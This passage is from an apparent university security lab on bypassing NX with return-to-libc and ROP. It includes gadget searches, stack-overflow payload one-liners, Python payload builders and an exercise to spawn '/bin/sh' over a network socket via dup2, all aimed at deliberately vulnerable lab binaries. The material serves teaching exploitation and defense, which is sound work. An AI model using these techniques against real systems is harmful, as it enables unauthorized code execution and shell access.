NX        : ENABLED
PIE       : disabled
RELRO     : Partial
</code>


=== gadget finding in peda ===
Apart from **objdump**, which only finds aligned instructions, you can also use **dumprop** in peda to find all gadgets in a memory region or mapping:
<code bash>
gdb-peda$ start
....
gdb-peda$ dumprop
Warning: this can be very slow, do not run for large memory range
Writing ROP gadgets to file: a-rop.txt ...
0x8048467: ret
0x804835d: iret
0x804838f: repz ret
0x80483be: ret 0xeac1
0x80483a9: leave; ret
0x80485b4: inc ecx; ret
0x80484cf: pop ebp; ret
0x80482f5: pop ebx; ret
0x80484df: nop; repz ret
0x80483a8: ror cl,1; ret
0x804838e: add dh,bl; ret
0x80483e5: ror cl,cl; ret
0x8048465: add cl,cl; ret
0x804840b: leave; repz ret
0x8048371: sbb al,0x24; ret
0x80485b3: adc al,0x41; ret
0x8048370: mov ebx,[esp]; ret
0x80484de: nop; nop; repz ret
0x80483a7: call eax; leave; ret
0x80483e4: call edx; leave; ret
0x804840a: add ecx,ecx; repz ret
0x80484ce: pop edi; pop ebp; ret
</code>

A more targeted search is possible with **asmsearch**:
<code bash>
gdb-peda$ asmsearch "pop ? ; ret"
0x080482f5 : (5bc3)	pop    ebx;	ret
0x080484cf : (5dc3)	pop    ebp;	ret
0x080484f6 : (5bc3)	pop    ebx;	ret

gdb-peda$ asmsearch "pop ? ; pop ? ; ret"
0x080484ce : (5f5dc3)	pop    edi;	pop    ebp;	ret

gdb-peda$ asmsearch "call ?"
0x080483a7 : (ffd0)	call   eax
0x080483e4 : (ffd2)	call   edx
0x0804842f : (ffd0)	call   eax

</code>
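To see why unaligned searching finds more than a linear disassembly, here is a rough sketch of a byte-level scan for ''pop reg; ret'' sequences. It is not how peda implements ''asmsearch'' or ''dumprop''; it only illustrates the idea. The ''5f 5d c3'' bytes match the gadget shown above, the surrounding ''90'' bytes and the base address are made up.

```python
# Registers for the one-byte `pop r32` opcodes 0x58..0x5f
POP_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def find_pop_ret(code, base):
    """Find runs of `pop reg` followed by `ret` at every byte offset."""
    gadgets = []
    for end, byte in enumerate(code):
        if byte != 0xC3:                       # 0xc3 is `ret`
            continue
        start = end
        # Walk backwards while the preceding byte is a `pop reg` opcode
        while start > 0 and 0x58 <= code[start - 1] <= 0x5F:
            start -= 1
            regs = [POP_REGS[b - 0x58] for b in code[start:end]]
            text = "; ".join("pop " + r for r in regs) + "; ret"
            gadgets.append((base + start, text))
    return gadgets

blob = bytes.fromhex("90" "5f5dc3" "90")
for addr, text in find_pop_ret(blob, base=0x80484CD):
    print(hex(addr), text)
```

The scan treats every ''c3'' byte as a potential ''ret'', even if the original program only uses that byte as part of a longer instruction.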

=== Anti-anti-debugging and others ===
There can be various annoyances in binaries: **ptrace** calls for anti-debugging, **sleep** calls to prevent bruteforcing, or **fork** calls that use child processes to serve requests.
These can all be neutralized in peda using **unptrace** (for ptrace) and **deactive** (for the other functions).


===== Challenges =====

==== 00. Tutorial - Bypass NX Stack with return-to-libc ====

Go to the ''01-tutorial-ret-to-libc/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].

In the previous sessions we used stack overflow vulnerabilities to inject new code into a running process (on its stack) and redirect execution to it. This attack is easily defeated by making the stack, together with any other memory page that can be modified, non-executable. This is achieved by setting the NX bit in the page table.

We will try to bypass this protection for the ''01-tutorial-ret-to-libc/src/auth'' binary in the lab archive. Build the auth program or use the already compiled one. For now, disable ASLR in a new shell:

<code>
setarch $(uname -m) -R /bin/bash
</code>

Let's take a look at the program headers and confirm that the stack is no longer executable. We only have read and write (RW) permissions for the stack area.

<note important>
The auth binary requires the ''libssl1.0.0:i386'' Debian package to work. Recompiling it requires ''libssl-dev:i386'', which might remove ''gcc''. So make sure you also install ''gcc'' afterwards.

You can find ''libssl1.0.0:i386'' Debian package [[https://packages.debian.org/jessie/i386/libssl1.0.0/download | here ]].
</note>

<code bash>
$ checksec 1-random
    [...]
    NX:       NX enabled
    [...]
</code>
For completeness, let's check that there is indeed a buffer (stack) overflow vulnerability.
<code>
$ python -c 'print "A" * 1357' | ltrace -i ./auth
[0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 <unfinished ...>
[0x8048601] malloc(20)                                                                            = 0x0804b008
[0x80485df] puts("Enter password: "Enter password: 
)                                                              = 17
[0x80485ea] gets(0xbfffee63, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7)                        = 0xbfffee63
[0x8048652] memset(0x0804b008, '\000', 20)                                                        = 0x0804b008
[0x8048671] SHA1(0xbfffee63, 137, 0x804b008, 4, 0x41000001)                                       = 0x804b008
[0x41414141] --- SIGSEGV (Segmentation fault) ---
[0xffffffff] +++ killed by SIGSEGV +++
</code>

Check the source file - the buffer length is ''1337'' bytes. The saved base pointer and the return address into ''main()'' should sit right after the buffer on the stack. There is also some alignment involved, but we can easily try a few lengths to get the right position of the return address. In this case it turns out to be ''1337 + 16'' bytes of padding followed by the return address. You can, of course, determine the exact distance between the buffer's start address and the frame's return address using ''objdump'', but we will leave that as an exercise.

We can now jump anywhere. Unfortunately, we cannot put shellcode in the buffer and jump into it because the stack is non-executable now. Let's try it with a few NOPs. Our buffer's address is ''0xbfffee63'' (see the ''gets()'' call).
<code>
$ python -c 'print "\x90\x90\x90\x90" + "A" * 1349 + "\x63\xee\xff\xbf"' | ltrace -i ./auth
[0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 <unfinished ...>
[0x8048601] malloc(20)                                                                            = 0x0804b008
[0x80485df] puts("Enter password: "Enter password: 
)                                                              = 17
[0x80485ea] gets(0xbfffee63, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7)                        = 0xbfffee63
[0x8048652] memset(0x0804b008, '\000', 20)                                                        = 0x0804b008
[0x8048671] SHA1(0xbfffee63, 137, 0x804b008, 4, 0x90000001)                                       = 0x804b008
[0xbfffee63] --- SIGSEGV (Segmentation fault) ---
[0xffffffff] +++ killed by SIGSEGV +++
</code>
Oh, such a bummer! It didn't work. How about we try to jump to some existing code?
<code>
$ objdump -d auth | grep -A 15 "<check_password>:"
080485ec <check_password>:
 80485ec:	55                   	push   %ebp
 80485ed:	89 e5                	mov    %esp,%ebp
 80485ef:	81 ec 58 05 00 00    	sub    $0x558,%esp
 80485f5:	c7 04 24 14 00 00 00 	movl   $0x14,(%esp)
 80485fc:	e8 9f fe ff ff       	call   80484a0 <malloc@plt>
 8048601:	a3 38 a0 04 08       	mov    %eax,0x804a038
 8048606:	a1 38 a0 04 08       	mov    0x804a038,%eax
 804860b:	85 c0                	test   %eax,%eax
 804860d:	75 18                	jne    8048627 <check_password+0x3b>
 804860f:	c7 04 24 76 87 04 08 	movl   $0x8048776,(%esp)
 8048616:	e8 95 fe ff ff       	call   80484b0 <puts@plt>
 804861b:	c7 04 24 01 00 00 00 	movl   $0x1,(%esp)
 8048622:	e8 99 fe ff ff       	call   80484c0 <exit@plt>
 8048627:	8d 85 bb fa ff ff    	lea    -0x545(%ebp),%eax
 804862d:	89 04 24             	mov    %eax,(%esp)
</code>
Let's try ''0x804860f'' so that we print the ''malloc'' failure message.
<code>
$ python -c 'print "A" * 1353 + "\x0f\x86\x04\x08"' | ltrace -i -e puts ./auth
[0x80485df] puts("Enter password: "Enter password: 
)                                                              = 17
[0x804861b] puts("malloc failed"malloc failed
)                                                                 = 14
[0xffffffff] +++ exited (status 1) +++

</code>
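The one-liner above relies on Python 2 string semantics. A rough Python 3 equivalent, assuming the same padding and target address as in the command, could look like this:

```python
import struct
import sys

PAD = 1337 + 16         # bytes from the start of the buffer to the return address
TARGET = 0x804860F      # instruction that sets up the puts("malloc failed") call

# gets() stops at the newline, so it terminates the input
payload = b"A" * PAD + struct.pack("<I", TARGET) + b"\n"

if __name__ == "__main__":
    # Raw bytes must go through the binary buffer in Python 3
    sys.stdout.buffer.write(payload)
```

Saved under a name of your choice, the script can be piped into ''ltrace -i -e puts ./auth'' in place of the ''python -c'' command.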


==== 01. Challenge - ret-to-libc ====

Looks good! Let's get serious and do something useful with this.

Continue working in the ''01-tutorial-ret-to-libc/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].

The final goal of this task is to bypass the NX stack protection and call ''system("/bin/sh")''. We will start with a simple **ret-to-plt**:

  - Display all ''libc'' functions linked with the ''auth'' binary.
  - Return to ''puts()''. Use ''ltrace'' to show that the call is actually being made.
  - Find the offset of the ''"malloc failed"'' static string in the binary.
  - Make the binary print ''"failed"'' the second time ''puts'' is called.
  - **(bonus)** The process should ''SEGFAULT'' after printing ''"Enter password:"'' again. Make it exit cleanly (the exit code does not matter, just no ''SIGSEGV''). You can move on to the next task without solving this problem.
  - Remember how we had ASLR disabled? The other ''libc'' functions are in memory, you just need to find their addresses. Find the offset of ''system()'' in ''libc''. Find the offset of the ''"/bin/sh"'' string in ''libc''.
  - Where is ''libc'' linked in the ''auth'' binary? Compute the final addresses and call ''system("/bin/sh")'' just like you did with ''puts''.
<note important>
//Hint//: Use ''LD_TRACE_LOADED_OBJECTS=1 ./auth'' instead of ''ldd''. The latter is not always reliable because the order in which it loads the libraries might be different than when you actually run the binary.
</note>

<note important>
//Hint//: When you finally run the attack, ''stdin'' will get closed and the new shell will have nothing to read. Use cat to concatenate your attack string with ''stdin'' like this: ''cat <(python -c 'print "L33T_ATTACK"') - | ./vulnbinary''.
</note>
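The address arithmetic for the last two steps is just "base plus offset". The sketch below shows the shape of the computation and of the resulting payload; the base address and both offsets are **placeholders** and must be replaced with the values you find on your own system.

```python
import struct

def dw(value):
    """Pack a 32-bit little-endian dword."""
    return struct.pack("<I", value)

# All three values below are placeholders, not real addresses
LIBC_BASE     = 0xB7E00000    # where libc is mapped (LD_TRACE_LOADED_OBJECTS=1 ./auth)
SYSTEM_OFFSET = 0x0003A000    # offset of system() inside libc
BINSH_OFFSET  = 0x00150000    # offset of the "/bin/sh" string inside libc
PAD           = 1337 + 16     # distance to the return address found in the tutorial

system_addr = LIBC_BASE + SYSTEM_OFFSET
binsh_addr  = LIBC_BASE + BINSH_OFFSET

payload  = b"A" * PAD
payload += dw(system_addr)    # overwritten return address
payload += b"JUNK"            # return address for system(), unused
payload += dw(binsh_addr)     # first argument of system()
print(hex(system_addr), hex(binsh_addr))
```

Keep in mind that ''gets()'' stops reading at a newline, so a final address containing the byte ''0x0a'' would truncate the payload.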

==== 02. Challenge - no-ret-control ====

Go to the ''02-challenge-no-ret-control/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].

Imagine this scenario: we have an executable in which we can overwrite at least 4 bytes at an arbitrary memory address, but ASLR is turned on. Because of this, we cannot reliably change the value of the return address. Sometimes ''ret'' is not even called at the end of a function.

Alter the execution of ''force_exit'', in order to call the secret function.

==== 03. Challenge - ret-to-plt ====

Go to the ''03-challenge-ret-to-plt/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].

''random'' is a small application that generates a random number.

Your task is to build an exploit that makes the application always print the **same second random number**. That is, the first printed random number can be anything, but the second printed random number must always be the same across all runs. In the sample output below, the second printed random number is ''1023098942'' in every run.

<code text>
hari@solyaris-home:~$ python -c 'print <payload here>' | ./random
Hi! Options:
	1. Get random number
	2. Go outside
Here's a random number: 2070249950. Have fun with it!
Hi! Options:
	1. Get random number
	2. Go outside
Here's a random number: 1023098942. Have fun with it!
Segmentation fault (core dumped)
hari@solyaris-home:~$ python -c 'print <payload here>' | ./random
Hi! Options:
	1. Get random number
	2. Go outside
Here's a random number: 1152946153. Have fun with it!
Hi! Options:
	1. Get random number
	2. Go outside
Here's a random number: 1023098942. Have fun with it!

</code>
  
You can use this Python skeleton for buffer overflow input:

<file python skel.py>
#!/usr/bin/env python3
import struct, sys

def dw(i):
	# Pack i as a little-endian 32-bit dword
	return struct.pack("<I", i)

#TODO update count for your prog
pad_count_to_ret = 100
payload = b"X" * pad_count_to_ret

#TODO figure out where to return
ret_addr = 0xdeadbeef
payload += dw(ret_addr)


#TODO add stuff after the payload if you need to
payload += b""

# Write raw bytes; in Python 3 sys.stdout.write() only accepts str
sys.stdout.buffer.write(payload)
</file>

**Bonus**: The process should SEGFAULT after printing the second (constant) number. Make it exit cleanly (the exit code does not matter, just no SIGSEGV).


==== 04. Challenge - Gadget tutorial ====

This task requires you to construct a payload that uses gadgets and calls the functions inside the binary so that it prints:
<code>
Hello!
stage A!stage B!
</code>
Make it also print the messages in reverse order:
<code>
Hello!
stage B!stage A!
</code>
==== Bonus Challenge - Echo service ====
This task is a network service that can be exploited. Run it locally and try to exploit it. You'll find that if you call system("/bin/sh") the shell is opened in the terminal where the server was started instead of the one where the attack takes place. This happens because the client-server communication takes place over a socket. When you spawn a shell, it inherits the standard I/O descriptors from the parent and uses those. To fix this you need to redirect the socket fd into descriptors 0 and 1 (and optionally 2).

So you will need to do the equivalent of the following in a ROP chain:
<code c>
	dup2(sockfd, 1);
	dup2(sockfd, 0);
	system("/bin/sh");
</code>


Exploit it first with ASLR disabled and then enabled.